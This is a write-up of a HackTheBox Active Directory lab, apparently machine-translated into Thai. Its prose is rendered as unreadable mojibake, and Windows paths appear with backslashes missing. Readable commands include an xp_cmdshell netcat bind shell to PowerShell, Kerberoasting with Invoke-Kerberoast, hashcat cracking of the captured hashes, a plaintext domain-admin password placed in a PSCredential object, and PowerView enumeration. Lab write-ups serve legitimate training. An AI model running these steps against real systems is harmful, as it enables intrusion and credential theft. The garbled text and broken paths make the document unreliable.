āļ•āļ­āļ™āļ™āļĩāđ‰āļœāđˆāļēāļ™ MSSQL āđ€āļĢāļēāđ€āļ›āļīāļ”āļ•āļąāļ§āļŸāļąāļ‡

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āđ€āļĢāļēāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļœāđˆāļēāļ™āļžāļĢāđ‡āļ­āļāļ‹āļĩāļ‚āļ­āļ‡āđ€āļĢāļē

proxychains rlwrap nc poo.htb 4321

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļĨāļ°āļĄāļēāļĢāļąāļšāđāļŪāļŠāļāļąāļ™

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ–āļąāļ”āđ„āļ› āļ„āļļāļ“āļ•āđ‰āļ­āļ‡āļ§āļ™āļ‹āđ‰āļģāđāļŪāļŠāđ€āļŦāļĨāđˆāļēāļ™āļĩāđ‰ āđ€āļ™āļ·āđˆāļ­āļ‡āļˆāļēāļ rockyou āđ„āļĄāđˆāļĄāļĩāļžāļˆāļ™āļēāļ™āļļāļāļĢāļĄāļ‚āđ‰āļ­āļĄāļđāļĨāļĢāļŦāļąāļŠāļœāđˆāļēāļ™ āļ‰āļąāļ™āļˆāļķāļ‡āđƒāļŠāđ‰āļžāļˆāļ™āļēāļ™āļļāļāļĢāļĄāļĢāļŦāļąāļŠāļœāđˆāļēāļ™āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļ—āļĩāđˆāļĄāļĩāđƒāļŦāđ‰āđƒāļ™ Seclists āļŠāļģāļŦāļĢāļąāļšāļāļēāļĢāđāļˆāļ‡āļ™āļąāļšāđ€āļĢāļēāđƒāļŠāđ‰ hashcat

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

āđāļĨāļ°āđ€āļĢāļēāļžāļšāļĢāļŦāļąāļŠāļœāđˆāļēāļ™āļ—āļąāđ‰āļ‡āļŠāļ­āļ‡āļ­āļąāļ™ āļ­āļąāļ™āđāļĢāļāļ­āļĒāļđāđˆāđƒāļ™āļžāļˆāļ™āļēāļ™āļļāļāļĢāļĄ dutch_passwordlist.txt āđāļĨāļ°āļ­āļąāļ™āļ—āļĩāđˆāļŠāļ­āļ‡āļ­āļĒāļđāđˆāđƒāļ™ Keyboard-Combinations.txt

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļĄāļĩāļœāļđāđ‰āđƒāļŠāđ‰āļŠāļēāļĄāļ„āļ™ āđ„āļ›āļ—āļĩāđˆāļ•āļąāļ§āļ„āļ§āļšāļ„āļļāļĄāđ‚āļ”āđ€āļĄāļ™ āļĨāļ­āļ‡āļŦāļēāļ—āļĩāđˆāļ­āļĒāļđāđˆāļ‚āļ­āļ‡āđ€āļ‚āļēāļāđˆāļ­āļ™

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĒāļĩāđˆāļĒāļĄāļĄāļēāļ āđ€āļĢāļēāđ„āļ”āđ‰āđ€āļĢāļĩāļĒāļ™āļĢāļđāđ‰āļ—āļĩāđˆāļ­āļĒāļđāđˆ IP āļ‚āļ­āļ‡āļ•āļąāļ§āļ„āļ§āļšāļ„āļļāļĄāđ‚āļ”āđ€āļĄāļ™āđāļĨāđ‰āļ§ āļĄāļēāļ”āļđāļāļąāļ™āļ§āđˆāļēāļœāļđāđ‰āđƒāļŠāđ‰āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļ‚āļ­āļ‡āđ‚āļ”āđ€āļĄāļ™āļĢāļ§āļĄāļ–āļķāļ‡āđƒāļ„āļĢāđ€āļ›āđ‡āļ™āļœāļđāđ‰āļ”āļđāđāļĨāļĢāļ°āļšāļš āđ€āļžāļ·āđˆāļ­āļ”āļēāļ§āļ™āđŒāđ‚āļŦāļĨāļ”āļŠāļ„āļĢāļīāļ›āļ•āđŒāđ€āļžāļ·āđˆāļ­āļĢāļąāļšāļ‚āđ‰āļ­āļĄāļđāļĨ PowerView.ps1 āļˆāļēāļāļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļ°āđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āđ‚āļ”āļĒāđƒāļŠāđ‰ evil-winrm āđ‚āļ”āļĒāļĢāļ°āļšāļļāđ„āļ”āđ€āļĢāđ‡āļāļ—āļ­āļĢāļĩāļ”āđ‰āļ§āļĒāļŠāļ„āļĢāļīāļ›āļ•āđŒāđƒāļ™āļžāļēāļĢāļēāļĄāļīāđ€āļ•āļ­āļĢāđŒ -s āļˆāļēāļāļ™āļąāđ‰āļ™āđ€āļžāļĩāļĒāļ‡āđ‚āļŦāļĨāļ”āļŠāļ„āļĢāļīāļ›āļ•āđŒ PowerView

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ•āļ­āļ™āļ™āļĩāđ‰āđ€āļĢāļēāļŠāļēāļĄāļēāļĢāļ–āđ€āļ‚āđ‰āļēāļ–āļķāļ‡āļŸāļąāļ‡āļāđŒāļŠāļąāđˆāļ™āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āđ„āļ”āđ‰āđāļĨāđ‰āļ§ āļœāļđāđ‰āđƒāļŠāđ‰ p00_adm āļ”āļđāđ€āļŦāļĄāļ·āļ­āļ™āļœāļđāđ‰āđƒāļŠāđ‰āļ—āļĩāđˆāļĄāļĩāļŠāļīāļ—āļ˜āļīāļžāļīāđ€āļĻāļĐ āļ”āļąāļ‡āļ™āļąāđ‰āļ™āđ€āļĢāļēāļˆāļ°āļ—āļģāļ‡āļēāļ™āđƒāļ™āļšāļĢāļīāļšāļ—āļ‚āļ­āļ‡āļĄāļąāļ™ āļĄāļēāļŠāļĢāđ‰āļēāļ‡āļ§āļąāļ•āļ–āļļ PSCredential āļŠāļģāļŦāļĢāļąāļšāļœāļđāđ‰āđƒāļŠāđ‰āļ™āļĩāđ‰āļāļąāļ™āđ€āļ–āļ­āļ°

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

āļ•āļ­āļ™āļ™āļĩāđ‰āļ„āļģāļŠāļąāđˆāļ‡ Powershell āļ—āļąāđ‰āļ‡āļŦāļĄāļ”āļ—āļĩāđˆāđ€āļĢāļēāļĢāļ°āļšāļļ Creds āļˆāļ°āļ–āļđāļāļ”āļģāđ€āļ™āļīāļ™āļāļēāļĢāđƒāļ™āļ™āļēāļĄāļ‚āļ­āļ‡ p00_adm āđāļŠāļ”āļ‡āļĢāļēāļĒāļŠāļ·āđˆāļ­āļœāļđāđ‰āđƒāļŠāđ‰āđāļĨāļ°āđāļ­āļ•āļ—āļĢāļīāļšāļīāļ§āļ•āđŒ AdminCount

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ”āļąāļ‡āļ™āļąāđ‰āļ™ āļœāļđāđ‰āđƒāļŠāđ‰āļ‚āļ­āļ‡āđ€āļĢāļēāļˆāļķāļ‡āđ„āļ”āđ‰āļĢāļąāļšāļŠāļīāļ—āļ˜āļīāļžāļīāđ€āļĻāļĐāļˆāļĢāļīāļ‡āđ† āļĄāļēāļ”āļđāļāļąāļ™āļ§āđˆāļēāđ€āļ‚āļēāļˆāļąāļ”āļ­āļĒāļđāđˆāđƒāļ™āļāļĨāļļāđˆāļĄāđ„āļŦāļ™

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđƒāļ™āļ—āļĩāđˆāļŠāļļāļ”āđ€āļĢāļēāļāđ‡āļĒāļ·āļ™āļĒāļąāļ™āļ§āđˆāļēāļœāļđāđ‰āđƒāļŠāđ‰āđ€āļ›āđ‡āļ™āļœāļđāđ‰āļ”āļđāđāļĨāđ‚āļ”āđ€āļĄāļ™ āļŠāļīāđˆāļ‡āļ™āļĩāđ‰āđƒāļŦāđ‰āļŠāļīāļ—āļ˜āļīāđŒāđƒāļ™āļāļēāļĢāđ€āļ‚āđ‰āļēāļŠāļđāđˆāļĢāļ°āļšāļšāļ•āļąāļ§āļ„āļ§āļšāļ„āļļāļĄāđ‚āļ”āđ€āļĄāļ™āļˆāļēāļāļĢāļ°āļĒāļ°āđ„āļāļĨ āļĨāļ­āļ‡āđ€āļ‚āđ‰āļēāļŠāļđāđˆāļĢāļ°āļšāļšāļ”āđ‰āļ§āļĒ WinRM āđ‚āļ”āļĒāđƒāļŠāđ‰āļ­āļļāđ‚āļĄāļ‡āļ„āđŒāļ‚āļ­āļ‡āđ€āļĢāļē āļ‰āļąāļ™āļŠāļąāļšāļŠāļ™āļāļąāļšāļ‚āđ‰āļ­āļœāļīāļ”āļžāļĨāļēāļ”āļ—āļĩāđˆāļ­āļ­āļāđ‚āļ”āļĒ reGeorg āđ€āļĄāļ·āđˆāļ­āđƒāļŠāđ‰ evil-winrm

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļˆāļēāļāļ™āļąāđ‰āļ™āđ€āļĢāļēāļāđ‡āđƒāļŠāđ‰āļ­āļąāļ™āļ­āļ·āđˆāļ™āļ—āļĩāđˆāļ‡āđˆāļēāļĒāļāļ§āđˆāļē āļ•āđ‰āļ™āļ‰āļšāļąāļš āđ€āļžāļ·āđˆāļ­āđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āļāļąāļš WinRM āđ€āļ›āļīāļ”āđāļĨāļ°āđ€āļ›āļĨāļĩāđˆāļĒāļ™āļžāļēāļĢāļēāļĄāļīāđ€āļ•āļ­āļĢāđŒāļāļēāļĢāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđ€āļĢāļēāļžāļĒāļēāļĒāļēāļĄāđ€āļŠāļ·āđˆāļ­āļĄāļ•āđˆāļ­āđāļĨāļ°āđ€āļĢāļēāļ­āļĒāļđāđˆāđƒāļ™āļĢāļ°āļšāļš

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āđāļ•āđˆāđ„āļĄāđˆāļĄāļĩāļ˜āļ‡ āļˆāļēāļāļ™āļąāđ‰āļ™āļ”āļđāļ—āļĩāđˆāļœāļđāđ‰āđƒāļŠāđ‰āđāļĨāļ°āļ•āļĢāļ§āļˆāļŠāļ­āļšāđ€āļ”āļŠāļāđŒāļ—āđ‡āļ­āļ›

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ—āļĩāđˆ mr3ks āđ€āļĢāļēāļžāļšāļ˜āļ‡āđāļĨāļ°āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāđ€āļŠāļĢāđ‡āļˆāļŠāļĄāļšāļđāļĢāļ“āđŒ 100%

HackTheBoxendāđ€āļāļĄ āļ—āļēāļ‡āđ€āļ”āļīāļ™āļ‚āļ­āļ‡āļŦāđ‰āļ­āļ‡āļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļ›āļāļīāļšāļąāļ•āļīāļāļēāļĢāļĢāļļāļāļ­āļĒāđˆāļēāļ‡āļĄāļ·āļ­āļ­āļēāļŠāļĩāļž Pentest Active Directory

āļ™āļąāđˆāļ™āļ„āļ·āļ­āļ—āļąāđ‰āļ‡āļŦāļĄāļ” āđƒāļŦāđ‰āđāļŠāļ”āļ‡āļ„āļ§āļēāļĄāļ„āļīāļ”āđ€āļŦāđ‡āļ™āļ§āđˆāļēāļ„āļļāļ“āđ„āļ”āđ‰āđ€āļĢāļĩāļĒāļ™āļĢāļđāđ‰āļŠāļīāđˆāļ‡āđƒāļŦāļĄāđˆāļˆāļēāļāļšāļ—āļ„āļ§āļēāļĄāļ™āļĩāđ‰āļŦāļĢāļ·āļ­āđ„āļĄāđˆ āđāļĨāļ°āđ€āļ›āđ‡āļ™āļ›āļĢāļ°āđ‚āļĒāļŠāļ™āđŒāļāļąāļšāļ„āļļāļ“āļŦāļĢāļ·āļ­āđ„āļĄāđˆ

āļ„āļļāļ“āļŠāļēāļĄāļēāļĢāļ–āđ€āļ‚āđ‰āļēāļĢāđˆāļ§āļĄāļāļąāļšāđ€āļĢāļēāđ„āļ”āđ‰āļ—āļĩāđˆ Telegram. āļ„āļļāļ“āļŠāļēāļĄāļēāļĢāļ–āļ„āđ‰āļ™āļŦāļēāđ€āļ™āļ·āđ‰āļ­āļŦāļēāļ—āļĩāđˆāļ™āđˆāļēāļŠāļ™āđƒāļˆ āļŦāļĨāļąāļāļŠāļđāļ•āļĢāļ—āļĩāđˆāļœāļŠāļēāļ™āļĢāļ§āļĄ āđāļĨāļ°āļ‹āļ­āļŸāļ•āđŒāđāļ§āļĢāđŒāđ„āļ”āđ‰āļ—āļĩāđˆāļ™āļĩāđˆ āļĄāļēāļĢāļ§āļĄāļ•āļąāļ§āļāļąāļ™āđ€āļ›āđ‡āļ™āļŠāļļāļĄāļŠāļ™āļ—āļĩāđˆāļĄāļĩāļœāļđāđ‰āļ—āļĩāđˆāđ€āļ‚āđ‰āļēāđƒāļˆāļ”āđ‰āļēāļ™āđ„āļ­āļ—āļĩāļŦāļĨāļēāļĒāđ† āļ”āđ‰āļēāļ™ āđāļĨāđ‰āļ§āđ€āļĢāļēāļˆāļ°āļŠāļēāļĄāļēāļĢāļ–āļŠāđˆāļ§āļĒāđ€āļŦāļĨāļ·āļ­āļ‹āļķāđˆāļ‡āļāļąāļ™āđāļĨāļ°āļāļąāļ™āđƒāļ™āļ›āļĢāļ°āđ€āļ”āđ‡āļ™āļ”āđ‰āļēāļ™āđ„āļ­āļ—āļĩāđāļĨāļ°āļ„āļ§āļēāļĄāļ›āļĨāļ­āļ”āļ āļąāļĒāļ‚āļ­āļ‡āļ‚āđ‰āļ­āļĄāļđāļĨāđ„āļ”āđ‰āđ€āļŠāļĄāļ­

āļ—āļĩāđˆāļĄāļē: will.com

āļ‹āļ·āđ‰āļ­āđ‚āļŪāļŠāļ•āļīāđ‰āļ‡āļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļ–āļ·āļ­āđ„āļ”āđ‰āļŠāļģāļŦāļĢāļąāļšāđ„āļ‹āļ•āđŒāļ—āļĩāđˆāļĄāļĩāļāļēāļĢāļ›āđ‰āļ­āļ‡āļāļąāļ™ DDoS āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ VPS VDS ðŸ”Ĩ āļ‹āļ·āđ‰āļ­āļšāļĢāļīāļāļēāļĢāđ€āļ§āđ‡āļšāđ‚āļŪāļŠāļ•āļīāđ‰āļ‡āļ—āļĩāđˆāđ€āļŠāļ·āđˆāļ­āļ–āļ·āļ­āđ„āļ”āđ‰ āļžāļĢāđ‰āļ­āļĄāļĢāļ°āļšāļšāļ›āđ‰āļ­āļ‡āļāļąāļ™ DDoS āđāļĨāļ°āđ€āļ‹āļīāļĢāđŒāļŸāđ€āļ§āļ­āļĢāđŒ VPS/VDS | ProHoster